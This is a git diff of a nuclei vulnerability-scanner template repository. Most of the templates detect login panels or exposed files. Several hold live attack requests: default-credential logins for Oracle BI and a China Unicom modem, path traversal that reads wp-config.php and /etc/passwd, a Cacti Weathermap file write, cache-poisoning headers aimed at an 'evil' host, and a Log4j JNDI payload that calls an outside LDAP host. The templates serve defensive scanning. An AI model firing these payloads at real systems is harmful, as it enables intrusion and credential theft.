oracle-business-intelligence-login +info: + name: Oracle Business Intelligence Default Login + author: milo2012 + description: Oracle Business Intelligence default admin credentials were discovered. + severity: high + tags: oracle,default-login + reference: + - https://docs.oracle.com/cd/E12096_01/books/AnyDeploy/AnyDeployMisc2.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /xmlpserver/services/XMLPService HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + SOAPAction: "" + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + + + + + + {{username}} + {{password}} + bi + + + + payloads: + username: + - Administrator + password: + - Administrator + attack: pitchfork + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'createSessionReturn' + part: body + +# Enhanced by mp on 2022/03/10 diff --git a/nuclei-templates/Other/buttercms.yaml b/nuclei-templates/Other/buttercms.yaml new file mode 100644 index 0000000000..5f0e88e387 --- /dev/null +++ b/nuclei-templates/Other/buttercms.yaml @@ -0,0 +1,23 @@ +id: api-buttercms + +info: + name: ButterCMS API Test + author: zzeitlin + reference: https://buttercms.com/docs/api/#introduction + severity: info + + +self-contained: true +requests: + - method: GET + path: + - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" + + matchers: + - type: word + part: body + words: + - '"meta":' + - '"data":' + - '"url":' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/cab-fare-calculator-lfi-819.yaml b/nuclei-templates/Other/cab-fare-calculator-lfi.yaml similarity index 100% rename from nuclei-templates/Other/cab-fare-calculator-lfi-819.yaml rename to nuclei-templates/Other/cab-fare-calculator-lfi.yaml diff --git a/nuclei-templates/Other/cache-poisoning-823.yaml b/nuclei-templates/Other/cache-poisoning-823.yaml new file mode 100644 index 0000000000..866bb48031 --- /dev/null +++ b/nuclei-templates/Other/cache-poisoning-823.yaml @@ -0,0 +1,27 @@ +id: cache-poisoning + +info: + name: HTTP Cache Poisoning + author: sirpedrotavares / seguranca-informatica.pt + severity: medium + +requests: + - raw: + - | + GET /?evil=007 HTTP/1.1 + X-Forwarded-Prefix: cache.my.evil.dns.com + X-Forwarded-Host: cache.my.evil.dns.com + X-Forwarded-For: cache.my.evil.dns.com + X-Originating-IP: cache.my.evil.dns.com + X-Remote-IP: cache.my.evil.dns.com + X-Remote-Addr: cache.my.evil.dns.com + X-Client-IP: cache.my.evil.dns.com + + - | + GET /?evil=007 HTTP/1.1 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "cache.my.evil.dns.com") == true' diff --git a/nuclei-templates/Other/cache_piossing (copy 1).yaml b/nuclei-templates/Other/cache_piossing (copy 1).yaml deleted file mode 100644 index 0a5918b84b..0000000000 --- a/nuclei-templates/Other/cache_piossing (copy 1).yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: cache-poisoning - -info: - name: Cache Poisoning - author: melbadry9 & xelkomy - severity: low - -requests: - - raw: - - | - GET /?mel=9 HTTP/1.1 - X-Forwarded-Prefix: cache.melbadry9.com - X-Forwarded-Host: cache.melbadry9.com - X-Forwarded-For: cache.melbadry9.com - - - | - GET /?mel=9 HTTP/1.1 - - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_2, "cache.melbadry9.com") == true' diff --git a/nuclei-templates/Other/cacti-panel-829.yaml b/nuclei-templates/Other/cacti-panel.yaml similarity index 100% rename from nuclei-templates/Other/cacti-panel-829.yaml rename to nuclei-templates/Other/cacti-panel.yaml diff --git a/nuclei-templates/Other/cacti-weathermap-file-write-833.yaml b/nuclei-templates/Other/cacti-weathermap-file-write-833.yaml deleted file mode 100644 index 4a23dacbb9..0000000000 --- a/nuclei-templates/Other/cacti-weathermap-file-write-833.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: cacti-weathermap-file-write -info: - name: Cacti Weathermap File Write - author: pikpikcu - severity: medium - reference: - - https://www.freebuf.com/articles/system/125177.html - tags: injection,cacti -requests: - - method: GET - path: - - "{{BaseURL}}/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7" - - method: GET - path: - - "{{BaseURL}}/plugins/weathermap/configs/poc.conf" - matchers-condition: and - matchers: - - type: word - words: - - "TITLE 46ea1712d4b13b55b3f680cc5b8b54e8" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/cacti-weathermap-file-write.yaml b/nuclei-templates/Other/cacti-weathermap-file-write.yaml new file mode 100644 index 0000000000..04a5d1b654 --- /dev/null +++ b/nuclei-templates/Other/cacti-weathermap-file-write.yaml @@ -0,0 +1,26 @@ +id: cacti-weathermap-file-write + +info: + name: Cacti Weathermap File Write + author: pikpikcu + severity: medium + reference: https://www.freebuf.com/articles/system/125177.html + tags: injection,cacti + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7" + - method: GET + path: + - "{{BaseURL}}/plugins/weathermap/configs/poc.conf" + + matchers-condition: and + matchers: + - type: word + words: + - "TITLE 46ea1712d4b13b55b3f680cc5b8b54e8" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/call-break-cms-840.yaml b/nuclei-templates/Other/call-break-cms.yaml similarity index 100% rename from nuclei-templates/Other/call-break-cms-840.yaml rename to nuclei-templates/Other/call-break-cms.yaml diff --git a/nuclei-templates/Other/campaignmonitor-842.yaml b/nuclei-templates/Other/campaignmonitor-842.yaml new file mode 100644 index 0000000000..1ad9814f94 --- /dev/null +++ b/nuclei-templates/Other/campaignmonitor-842.yaml @@ -0,0 +1,17 @@ +id: campaignmonitor-takeover +info: + name: campaignmonitor takeover detection + author: pdteam + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - 'Trying to access your account?' + - 'or Trying to access your account?' - - 'or ' - - '404 Not Found
' - condition: and diff --git a/nuclei-templates/Other/cargocollective-takeover.yaml b/nuclei-templates/Other/cargocollective-takeover.yaml new file mode 100644 index 0000000000..fac909397b --- /dev/null +++ b/nuclei-templates/Other/cargocollective-takeover.yaml @@ -0,0 +1,18 @@ +id: cargocollective-takeover +info: + name: cargocollective takeover detection + author: pdteam + severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz + tags: takeover +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - '
' + - '404 Not Found
' + condition: and diff --git a/nuclei-templates/Other/cas-login-870.yaml b/nuclei-templates/Other/cas-login-870.yaml new file mode 100644 index 0000000000..b2f2d90bea --- /dev/null +++ b/nuclei-templates/Other/cas-login-870.yaml @@ -0,0 +1,19 @@ +id: cas-login +info: + name: CAS Login Panel + author: pdteam + severity: info + metadata: + shodan-query: http.title:'CAS - Central Authentication Service' + github: https://github.com/apereo/cas + tags: apereo,cas,panel,login +requests: + - method: GET + path: + - "{{BaseURL}}/cas/login" + redirects: true + max-redirects: 2 + matchers: + - type: word + words: + - 'Central Authentication Service' diff --git a/nuclei-templates/Other/cas-login.yaml b/nuclei-templates/Other/cas-login.yaml deleted file mode 100644 index 8a225d7e04..0000000000 --- a/nuclei-templates/Other/cas-login.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: cas-login - -info: - name: CAS Login Panel - author: pdteam - severity: info - tags: apereo,cas,panel,login - metadata: - shodan-query: http.title:'CAS - Central Authentication Service' - github: https://github.com/apereo/cas - -requests: - - method: GET - path: - - "{{BaseURL}}/cas/login" - - redirects: true - max-redirects: 2 - matchers: - - type: word - words: - - 'Central Authentication Service' diff --git a/nuclei-templates/Other/centreon-detect-875.yaml b/nuclei-templates/Other/centreon-detect-875.yaml new file mode 100644 index 0000000000..8c77644cef --- /dev/null +++ b/nuclei-templates/Other/centreon-detect-875.yaml @@ -0,0 +1,24 @@ +id: centreon-detect + +info: + name: Centreon Detect + author: pikpikcu + severity: info + tags: tech,centreon + +requests: + - method: GET + path: + - "{{BaseURL}}/centreon/index.php" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Centreon - IT & Network Monitoring" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/centreon-detect-877.yaml b/nuclei-templates/Other/centreon-detect-877.yaml deleted file mode 100644 index c3ca5df6a4..0000000000 --- a/nuclei-templates/Other/centreon-detect-877.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: centreon-detect - -info: - name: Centreon Detect - author: pikpikcu - severity: info - tags: tech,centreon - -requests: - - method: GET - path: - - "{{BaseURL}}/centreon/index.php" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "Centreon - IT & Network Monitoring" - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/certificate-validation-882.yaml b/nuclei-templates/Other/certificate-validation-882.yaml new file mode 100644 index 0000000000..c8969eea4f --- /dev/null +++ b/nuclei-templates/Other/certificate-validation-882.yaml @@ -0,0 +1,12 @@ +id: improper-certificate-validation +info: + name: Improper Certificate Validation + author: gaurang + severity: medium +file: + - extensions: + - all + matchers: + - type: word + words: + - "Landroid/webkit/SslErrorHandler;->proceed()V" diff --git a/nuclei-templates/Other/certificate-validation.yaml b/nuclei-templates/Other/certificate-validation.yaml deleted file mode 100644 index 64a9fecc52..0000000000 --- a/nuclei-templates/Other/certificate-validation.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: improper-certificate-validation - -info: - name: Improper Certificate Validation - author: gaurang - severity: medium - tags: android,file - -file: - - extensions: - - all - - matchers: - - type: word - words: - - "Landroid/webkit/SslErrorHandler;->proceed()V" \ No newline at end of file diff --git a/nuclei-templates/Other/cgi-printenv-886.yaml b/nuclei-templates/Other/cgi-printenv-886.yaml index 0deacd17e0..0410dfbd68 100644 --- a/nuclei-templates/Other/cgi-printenv-886.yaml +++ b/nuclei-templates/Other/cgi-printenv-886.yaml @@ -1,15 +1,19 @@ id: cgi-printenv + info: - author: emadshanab name: CGI script environment variable + author: emadshanab severity: medium description: A test CGI (Common Gateway Interface) script was found on this server. The response page returned by this CGI script is leaking a list of server environment variables. - reference: https://www.acunetix.com/vulnerabilities/web/test-cgi-script-leaking-environment-variables/ + reference: + - https://www.acunetix.com/vulnerabilities/web/test-cgi-script-leaking-environment-variables/ tags: exposure,generic,cgi + requests: - method: GET path: - "{{BaseURL}}/cgi-bin/printenv.pl" + matchers-condition: and matchers: - type: word @@ -20,6 +24,7 @@ requests: - 'SERVER_ADMIN' - 'Environment Variables:' condition: or + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/cgi-test-page-890.yaml b/nuclei-templates/Other/cgi-test-page.yaml similarity index 100% rename from nuclei-templates/Other/cgi-test-page-890.yaml rename to nuclei-templates/Other/cgi-test-page.yaml diff --git a/nuclei-templates/Other/chamilo-lms-sqli-891.yaml b/nuclei-templates/Other/chamilo-lms-sqli-892.yaml similarity index 100% rename from nuclei-templates/Other/chamilo-lms-sqli-891.yaml rename to nuclei-templates/Other/chamilo-lms-sqli-892.yaml diff --git a/nuclei-templates/Other/chamilo-lms-xss.yaml b/nuclei-templates/Other/chamilo-lms-xss.yaml index 77ecc3124b..0818c85597 100644 --- a/nuclei-templates/Other/chamilo-lms-xss.yaml +++ b/nuclei-templates/Other/chamilo-lms-xss.yaml @@ -1,7 +1,7 @@ id: chamilo-lms-xss info: name: Chamilo LMS Cross Site Scripting - author: geeknik + author: nithissh severity: medium description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/ tags: xss,chamilo diff --git a/nuclei-templates/Other/checkmarx-panel-895.yaml b/nuclei-templates/Other/checkmarx-panel-895.yaml deleted file mode 100644 index 70b24b66eb..0000000000 --- a/nuclei-templates/Other/checkmarx-panel-895.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: checkmarx-panel-detect - -info: - name: Checkmarx WebClient detector - author: joanbono - severity: info - tags: panel,checkmarx - -requests: - - method: GET - path: - - "{{BaseURL}}/cxwebclient/Login.aspx" - - matchers: - - type: word - words: - - '/CxWebClient/webApp/Scripts/libs/authenticationScripts' - part: body diff --git a/nuclei-templates/Other/checkmarx-panel-897.yaml b/nuclei-templates/Other/checkmarx-panel-897.yaml new file mode 100644 index 0000000000..4aa65b0e49 --- /dev/null +++ b/nuclei-templates/Other/checkmarx-panel-897.yaml @@ -0,0 +1,19 @@ +id: checkmarx-panel-detect + +info: + name: Checkmarx WebClient detector + author: joanbono + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/cxwebclient/Login.aspx" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers: + - type: word + words: + - '/CxWebClient/webApp/Scripts/libs/authenticationScripts' + part: body diff --git a/nuclei-templates/Other/checkpoint-panel-899.yaml b/nuclei-templates/Other/checkpoint-panel-898.yaml similarity index 100% rename from nuclei-templates/Other/checkpoint-panel-899.yaml rename to nuclei-templates/Other/checkpoint-panel-898.yaml diff --git a/nuclei-templates/Other/cherry-lfi-903.yaml b/nuclei-templates/Other/cherry-lfi-903.yaml new file mode 100644 index 0000000000..b0b6c0a44f --- /dev/null +++ b/nuclei-templates/Other/cherry-lfi-903.yaml @@ -0,0 +1,36 @@ +id: cherry-lfi + +info: + name: WordPress Cherry < 1.2.7 - Unauthenticated Arbitrary File Upload and Download + author: dhiyaneshDK + severity: high + description: WordPress plugin Cherry < 1.2.7 has a vulnerability which enables an attacker to upload files directly to the server. This could result in attacker uploading backdoor shell scripts or downloading the + wp-config.php file. + reference: + - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee + - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/Other/cherry-lfi.yaml b/nuclei-templates/Other/cherry-lfi.yaml deleted file mode 100644 index 7df075f0c8..0000000000 --- a/nuclei-templates/Other/cherry-lfi.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: cherry-lfi -info: - name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Upload and Download - author: dhiyaneshDK - severity: high - description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. - reference: - - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee - - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE - tags: wordpress,wp-plugin,lfi,wp -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/chinaunicom-default-login-906.yaml b/nuclei-templates/Other/chinaunicom-default-login-906.yaml deleted file mode 100644 index ad88f640d7..0000000000 --- a/nuclei-templates/Other/chinaunicom-default-login-906.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: chinaunicom-default-login -info: - name: China Unicom Modem Default Login - author: princechaddha - severity: high - description: Default login credentials were discovered for a China Unicom modem. - classification: - cwe-id: CWE-798 - tags: chinaunicom,default-login -requests: - - raw: - - | - POST /cu.html HTTP/1.1 - Host: {{Hostname}} - - frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password= - attack: pitchfork - payloads: - username: - - CUAdmin - password: - - CUAdmin - matchers-condition: and - matchers: - - type: status - status: - - 302 - - type: word - words: - - "/menu.gch" - part: header - -# Enhanced by mp on 2022/03/03 diff --git a/nuclei-templates/Other/chinaunicom-default-login.yaml b/nuclei-templates/Other/chinaunicom-default-login.yaml new file mode 100644 index 0000000000..0121060abf --- /dev/null +++ b/nuclei-templates/Other/chinaunicom-default-login.yaml @@ -0,0 +1,28 @@ +id: chinaunicom-default-login +info: + name: Chinaunicom Modem Default Login + author: princechaddha + severity: high + tags: chinaunicom,default-login +requests: + - raw: + - | + POST /cu.html HTTP/1.1 + Host: {{Hostname}} + + frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password= + attack: pitchfork + payloads: + username: + - CUAdmin + password: + - CUAdmin + matchers-condition: and + matchers: + - type: status + status: + - 302 + - type: word + words: + - "/menu.gch" + part: header diff --git a/nuclei-templates/Other/church-admin-lfi-912.yaml b/nuclei-templates/Other/church-admin-lfi-912.yaml deleted file mode 100644 index 9885353c52..0000000000 --- a/nuclei-templates/Other/church-admin-lfi-912.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: church-admin-lfi - -info: - name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal - author: 0x_Akoko - severity: high - description: The "key" parameter of download.php from plugins/church-admin/display/download.php is not sanitized and is vulnerable to a directory traversal type of attack. - reference: - - https://wpscan.com/vulnerability/8997 - - https://id.wordpress.org/plugins/church-admin/ - tags: wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd' - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/church-admin-lfi.yaml b/nuclei-templates/Other/church-admin-lfi.yaml new file mode 100644 index 0000000000..130de762a2 --- /dev/null +++ b/nuclei-templates/Other/church-admin-lfi.yaml @@ -0,0 +1,28 @@ +id: church-admin-lfi +info: + name: WordPress Church Admin 0.33.2.1 - Local File Inclusion + author: 0x_Akoko + severity: high + description: WordPress Church Admin 0.33.2.1 is vulnerable to local file inclusion via the "key" parameter of plugins/church-admin/display/download.php. + reference: + - https://wpscan.com/vulnerability/8997 + - https://id.wordpress.org/plugins/church-admin/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + tags: wordpress,wp-plugin,lfi +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd' + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/05 diff --git a/nuclei-templates/Other/circarlife-setup-920.yaml b/nuclei-templates/Other/circarlife-setup-920.yaml new file mode 100644 index 0000000000..808a1e8646 --- /dev/null +++ b/nuclei-templates/Other/circarlife-setup-920.yaml @@ -0,0 +1,28 @@ +id: circarlife-setup +info: + name: Exposed CirCarLife Setup Page + author: geeknik + description: CirCarLife is an internet-connected electric vehicle charging station + reference: https://circontrol.com/ + severity: critical + tags: scada,circontrorl,circarlife,setup,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/html/setup.html" + matchers-condition: and + matchers: + - type: word + part: header + words: + - "CirCarLife Scada" + - type: word + words: + - "- setup" + - "Network setup" + - "Modem setup" + - "Security setup" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/circarlife-setup.yaml b/nuclei-templates/Other/circarlife-setup.yaml deleted file mode 100644 index 13d2489404..0000000000 --- a/nuclei-templates/Other/circarlife-setup.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: circarlife-setup -info: - name: Exposed CirCarLife Setup Page - author: geeknik - description: CirCarLife is an internet-connected electric vehicle charging station - reference: https://circontrol.com/ - severity: critical - tags: scada,circontrorl,circarlife,setup,exposure,panel -requests: - - method: GET - path: - - "{{BaseURL}}/html/setup.html" - matchers-condition: and - matchers: - - type: word - part: header - words: - - "CirCarLife Scada" - - type: word - words: - - "- setup" - - "Network setup" - - "Modem setup" - - "Security setup" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/circleci-config-924.yaml b/nuclei-templates/Other/circleci-config-924.yaml new file mode 100644 index 0000000000..6483134342 --- /dev/null +++ b/nuclei-templates/Other/circleci-config-924.yaml @@ -0,0 +1,26 @@ +id: circleci-config + +info: + name: circleci config.yml exposure + author: geeknik + severity: low + reference: + - https://circleci.com/docs/2.0/sample-config/ + tags: config,exposure,circleci + +requests: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/.circleci/config.yml" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'regex("^version: ", body) && contains(body, "jobs:")' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/circleci-config.yaml b/nuclei-templates/Other/circleci-config.yaml deleted file mode 100644 index 98cf8b37cf..0000000000 --- a/nuclei-templates/Other/circleci-config.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: circleci-config - -info: - name: circleci config.yml exposure - author: geeknik - severity: low - reference: https://circleci.com/docs/2.0/sample-config/ - tags: config,exposure - -requests: - - method: GET - redirects: true - max-redirects: 3 - path: - - "{{BaseURL}}/.circleci/config.yml" - - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'regex("^version: ", body) && contains(body, "jobs:")' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/circleci-ssh-config.yaml b/nuclei-templates/Other/circleci-ssh-config.yaml index 0d19b816b8..3c3d245991 100644 --- a/nuclei-templates/Other/circleci-ssh-config.yaml +++ b/nuclei-templates/Other/circleci-ssh-config.yaml @@ -4,7 +4,7 @@ info: name: circleci ssh-config exposure author: geeknik severity: low - tags: config,exposure,circleci + tags: config,exposure requests: - method: GET diff --git a/nuclei-templates/Other/circleci.yaml b/nuclei-templates/Other/circleci.yaml deleted file mode 100644 index b01e427381..0000000000 --- a/nuclei-templates/Other/circleci.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-circleci - -info: - name: CircleCI API Test - author: zzeitlin - reference: https://circleci.com/docs/api/v1 - severity: info - tags: token-spray,circleci - -self-contained: true -requests: - - method: GET - path: - - "https://circleci.com/api/v1.1/me?circle-token={{token}}" - - matchers: - - type: word - part: body - words: - - '"admin"' - - '"login"' - condition: and diff --git a/nuclei-templates/Other/cisco-ace-device-manager-929.yaml b/nuclei-templates/Other/cisco-ace-device-manager-929.yaml new file mode 100644 index 0000000000..70e4205e76 --- /dev/null +++ b/nuclei-templates/Other/cisco-ace-device-manager-929.yaml @@ -0,0 +1,25 @@ +id: cisco-ace-device-manager + +info: + name: ACE 4710 Device Manager + author: dhiyaneshDk + severity: info + metadata: + shodan-query: html:"ACE 4710 Device Manager" + tags: panel,cisco + +requests: + - method: GET + path: + - "{{BaseURL}}/index.vm" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ACE 4710 DM - Login" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/cisco-ace-device-manager.yaml b/nuclei-templates/Other/cisco-ace-device-manager.yaml deleted file mode 100644 index 09704c579f..0000000000 --- a/nuclei-templates/Other/cisco-ace-device-manager.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: cisco-ace-device-manager - -info: - name: ACE 4710 Device Manager - author: dhiyaneshDk - severity: info - tags: panel,cisco - metadata: - shodan-query: 'html:"ACE 4710 Device Manager"' - -requests: - - method: GET - path: - - "{{BaseURL}}/index.vm" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "ACE 4710 DM - Login" - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/cisco-asa-panel.yaml b/nuclei-templates/Other/cisco-asa-panel-932.yaml similarity index 100% rename from nuclei-templates/Other/cisco-asa-panel.yaml rename to nuclei-templates/Other/cisco-asa-panel-932.yaml diff --git a/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml b/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml new file mode 100644 index 0000000000..af3f889993 --- /dev/null +++ b/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml @@ -0,0 +1,63 @@ +id: cisco-cloudcenter-suite-log4j-rce + +info: + name: Cisco CloudCenter Suite (Log4j)- Remote Code Execution + author: pwnhxl + severity: critical + description: | + Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. + reference: + - https://logging.apache.org/log4j/2.x/security.html + - http://www.openwall.com/lists/oss-security/2021/12/10/1 + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + fofa-query: title="CloudCenter Suite" + shodan-query: title:"CloudCenter Suite" + tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev + +requests: + - raw: + - | + @timeout: 10s + POST /suite-auth/login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}} + Content-Type: application/json + + {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + + - type: word + part: header + words: + - 'X-RateLimit-Limit-suite-gateway_suite-auth' + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + +# Enhanced by md on 2023/03/22 diff --git a/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml b/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml deleted file mode 100644 index 37a4dabf81..0000000000 --- a/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml +++ /dev/null @@ -1,73 +0,0 @@ -id: cisco-cloudcenter-suite-log4j-rce - -info: - name: Cisco CloudCenter Suite (Log4j) - Remote Code Execution - author: pwnhxl - severity: critical - description: | - Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. - remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. - reference: - - https://logging.apache.org/log4j/2.x/security.html - - http://www.openwall.com/lists/oss-security/2021/12/10/1 - - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2021-44228 - cwe-id: CWE-77 - metadata: - max-request: 1 - shodan-query: title:"CloudCenter Suite" - fofa-query: title="CloudCenter Suite" - tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev -variables: - rand1: '{{rand_int(111, 999)}}' - rand2: '{{rand_int(111, 999)}}' - -http: - - raw: - - | - @timeout: 10s - POST /suite-auth/login HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}} - Content-Type: application/json - - {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"} - - 